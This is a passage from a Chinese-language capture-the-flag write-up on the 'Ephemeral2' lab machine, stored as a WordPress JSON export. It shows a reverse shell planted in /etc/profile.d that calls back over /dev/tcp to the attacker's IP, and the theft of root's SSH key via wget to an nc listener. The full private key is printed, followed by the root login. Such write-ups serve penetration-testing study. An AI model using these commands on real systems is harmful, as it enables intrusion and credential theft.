\u8fd9\u5b9e\u9645\u4e0a\u662f\u542f\u52a8\u4ee5\u540e\u81ea\u52a8\u6267\u884c\u811a\u672c\u7684\u76ee\u5f55\uff0c\u5c1d\u8bd5\u6dfb\u52a0\u4e00\u4e2a\u53cd\u5f39shell\u5373\u53ef\u8fdb\u884c\u53cd\u5f39\uff0c\u4f46\u662f\u95ee\u9898\u662fralph<\/code>\u7528\u6237\u5e76\u6ca1\u6709\u8fdb\u884c\u767b\u5f55\uff0c\u6240\u4ee5\u6211\u4eec\u65e0\u6cd5\u53cd\u5f39\u5176\u6216\u8005\u662froot<\/code>\u7684shell<\/code>\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0bpspy64<\/code>!<\/p>\n
\"image-20240430205929680\"<\/div><\/p>\n
\u5206\u6790\u5229\u7528\u811a\u672c<\/h3>\n
\u53bb\u7785\u7785\u8fd9\u4e2a\u811a\u672c\uff1a<\/p>\n
(remote) randy@ephemeral:\/tmp$ cat \/home\/ralph\/tools\/ssh.sh\n#!\/bin\/bash\n\n\/usr\/bin\/ssh -o "StrictHostKeyChecking no" ralph@localhost -i \/home\/ralph\/.ssh\/id_rsa<\/code><\/pre>\n
\u5199\u4e00\u4e2a\u53cd\u5f39shell\uff0c\u8ba9\u5b9a\u65f6\u4efb\u52a1\u5f39\u8fc7\u6765\u5c31\u884c\u4e86\uff01<\/p>\n
(remote) randy@ephemeral:\/etc\/profile.d$ echo 'bash -c "exec bash -i &>\/dev\/tcp\/192.168.0.143\/2345 <&1"' > shell.sh\n(remote) randy@ephemeral:\/etc\/profile.d$ chmod +x shell.sh<\/code><\/pre>\n
\"image-20240430210340088\"<\/div><\/p>\n
nice\uff01\uff01\uff01\uff01<\/p>\n
\u63d0\u6743root<\/h3>\n
\u4fe1\u606f\u641c\u96c6\uff01<\/p>\n
File \/root\/.ssh\/id_rsa sent to 192.168.0.143\n\n--2024-04-30 07:05:26--  http:\/\/192.168.0.143\/\nConnecting to 192.168.0.143:80... connected.\nHTTP request sent, awaiting response... ^C(remote) ralph@ephemeral:\/home\/ralph$ <\/code><\/pre>\n
\u7136\u540e\u63a5\u6536\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ nc -lvnp 80  \nlistening on [any] 80 ...\nconnect to [192.168.0.143] from (UNKNOWN) [192.168.0.132] 53996\nPOST \/ HTTP\/1.1\nUser-Agent: Wget\/1.20.3 (linux-gnu)\nAccept: *\/*\nAccept-Encoding: identity\nHost: 192.168.0.143\nConnection: Keep-Alive\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 2602\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAvC4MPYoovfRh6ih3KhFFuvPC2C8nr53+sp7mxSQ7sMTb\/TFpzWml\n+CMuae031RWN85l3Tqb5BR\/MYvLstkhqIgp9ViUTYC6LdEaqRokXSqNVTiSZME0w7p0fB8\nRwzV7PSvYt\/j1usEUR0v8nv4Viuefjcgfa2T9RDOag87gCXdnQhV+a05ndMneAmQcGeX9U\n6U0a2X1sP8fYmbubMbob6CaxAIFF1EKU3pb99LMVQOYqJOS079HyqLdHsdpIq7clxLoRwK\nT5bbJ\/JFquZtGKPoR57tyDL1iWUeczR30ilL+Vl76V0CLmetLKYZAfYD21BHk\/wdgL+0WC\nY9dYQPiIlT6JK\/OYbf+obwAcFsfRGOANjrwBSDNOjLkxLgWCyTrU3vDwKadF+MWhFpzl74\njjiM\/9pd8KApB+jIqdTQh+fX3DpO48DtGEcryWjQg+cYvyfykyQPWmf9MqYf\/dMYA8w+MP\nklBAkehlYTlNPWn0j0b9XZcGUhweydDjK0z3iWMDAAAFiIQ3JjeENyY3AAAAB3NzaC1yc2\nEAAAGBALwuDD2KKL30YeoodyoRRbrzwtgvJ6+d\/rKe5sUkO7DE2\/0xac1ppfgjLmntN9UV\njfOZd06m+QUfzGLy7LZIaiIKfVYlE2Aui3RGqkaJF0qjVU4kmTBNMO6dHwfEcM1ez0r2Lf\n49brBFEdL\/J7+FYrnn43IH2tk\/UQzmoPO4Al3Z0IVfmtOZ3TJ3gJkHBnl\/VOlNGtl9bD\/H\n2Jm7mzG6G+gmsQCBRdRClN6W\/fSzFUDmKiTktO\/R8qi3R7HaSKu3JcS6EcCk+W2yfyRarm\nbRij6Eee7cgy9YllHnM0d9IpS\/lZe+ldAi5nrSymGQH2A9tQR5P8HYC\/tFgmPXWED4iJU+\niSvzmG3\/qG8AHBbH0RjgDY68AUgzToy5MS4Fgsk61N7w8CmnRfjFoRac5e+I44jP\/aXfCg\nKQfoyKnU0Ifn19w6TuPA7RhHK8lo0IPnGL8n8pMkD1pn\/TKmH\/3TGAPMPjD5JQQJHoZWE5\nTT1p9I9G\/V2XBlIcHsnQ4ytM94ljAwAAAAMBAAEAAAGAW3yvqsOepytG50ahGKypEAkus1\nfJnZHcoA6s9y90ba5nnaMGYz132TmReSJBQLFoAASegnifHKSnA3xDJSPzpXUgFl+UGfDH\nD9LDOeOwlTLvaDxW1arRnVB6I5aXmOD9Ot6Q4cgQJlaOIdy3AF\/i7asVYvz6oyArUXBW0+\nakD+izfgRLC5EEf2Kl\/L\/zn+IN8BbydMaLeD66yZLyEqz+oFEfQLWYs2djZQxXjz35mUHN\nP36JkQarSOdCTe9n4UP6nG3w\/35A8rXzNK1Hl+ZbrZF2jL7eoUB9Pee\/Q9IttmgoIBKzFK\nBTw\/BUHfxCgKmkhlqZO988d5nN9OvnH+GCLQXWf+1iW+9i8SYCuSK3jdkjGusOCV4XD1Hc\nBzLY3WaINMFBYH9T0hCHuB9WNBwFQYu\/Zt7xD10zQnAsm3rnKvSAN6rc4HWsDgRqp\/ZZ4P\nA+r5plnrq\/pvHMbZdVrdJhzuZPgkpK3gBLrko+Hy\/L63mTdgPMfv0fW0i+jYUayUkBAAAA\nwDvjonBov5PSsC4whNjUNjnjR4i\/V63ueCku7HAgVqJRcJP0vLaRJuI5kwApxNZIoSbo3y\nn5PO2JHAfiq0BI+2lh7q7Wi6tWC53I9CwwBKD8ODZn2UQ0I3TMJwmJxXoLUhQjfU0cUqW3\niZu1PShs1IEwUhsRrPQUSGvDx\/oIxemadqMbAqMmD2rKWl92bJ\/hXmjSpJoqQnAMFzbbqK\niHfga471Khyqs7xG1R1PgG2opNS4vavGDr19AJycKlUhz71gAAAMEA8EDJYexUnA0n6B+n\nNKLyWVTIC2emjQgb5M2xvoRSkyr2cfJf3AY7AIqtgtGwZLIUPCTxqwTuKUAgN\/UQLMc45C\nOOghUx88\/lXyDVwti+zYsmNEWKYv3bR3Ztc+IXL+khbUJzLJxARtFRJ4DbQ7B++Kqh7L1c\nr7woFiUtPswmhIstAuEFtK74hklnwnr308XxYuJfICWpNcm5XpwKDcRiRGYFPR4y9U\/h20\nC15k2pkLw3fR\/yaBFrVRLUwYvGfDLDAAAAwQDIg4YAFEBYjnVwxfYKZRJYCl1tNQokLW1X\ntBVP0WHYr2vFsliSfuoU3hposh7aibTODpmH3lBmWsNihUnElInsNUnWwFD3ScFKQqX2j0\nbeU\/roxWvaM0cJWNlZDoN98SCsPhD9GgdGWfwD0HsxZTqwoUbwyve40baj4HzuDYdQUa1W\na7pBHFLZFSfpF2zFQTXudFK5tXjVGuG2TrMScVfYJE1q045v2XfqpVU0INkFR3ebRtVqFc\nUc6CSig6CuisEAAAAOcm9vdEBlcGhlbWVyYWwBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u8fd9\u4e48\u6c34\u5230\u6e20\u6210\u7684\u5417\uff0c\u54c8\u54c8\u54c8\u3002<\/p>\n
\u5c1d\u8bd5\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ vim root         \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ chmod 600 root                                \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ ssh root@192.168.0.132 -i root                \nThe authenticity of host '192.168.0.132 (192.168.0.132)' can't be established.\nED25519 key fingerprint is SHA256:flddRz8ds6vGH6oIgNv4hqo92558dFPJ3n8Fkzv15Uc.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.132' (ED25519) to the list of known hosts.\nWelcome to Ubuntu 20.04.4 LTS (GNU\/Linux 5.13.0-39-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n20 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nNew release '22.04.3 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\nYour Hardware Enablement Stack (HWE) is supported until April 2025.\nLast login: Sun Apr 10 23:36:51 2022 from 10.0.0.69\nbash: connect: Connection refused\nbash: \/dev\/tcp\/192.168.0.143\/2345: Connection refused\nroot@ephemeral:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ephemeral:~# ls -la\ntotal 48\ndrwx------ 10 root root 4096 Apr 10  2022 .\ndrwxr-xr-x 20 root root 4096 Apr  7  2022 ..\nlrwxrwxrwx  1 root root    9 Apr  8  2022 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwx------  5 root root 4096 Apr 10  2022 .cache\ndrwx------  4 root root 4096 Apr  9  2022 .config\ndrwx------  3 root root 4096 Apr  9  2022 .dbus\ndrwxr-xr-x  2 root root 4096 Apr  9  2022 Downloads\ndrwxr-xr-x  3 root root 4096 Apr  7  2022 .local\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\ndrwxr-xr-x  2 root root 4096 Apr 10  2022 roottxt\ndrwx------  3 root root 4096 Apr  7  2022 snap\ndrwx------  2 root root 4096 Apr 10  2022 .ssh<\/code><\/pre>\n
\u62ff\u4e0brootshell\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Ephemeral2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2] […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-669","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/669","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=669"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/669\/revisions"}],"predecessor-version":[{"id":670,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/669\/revisions\/670"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=669"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=669"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=669"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}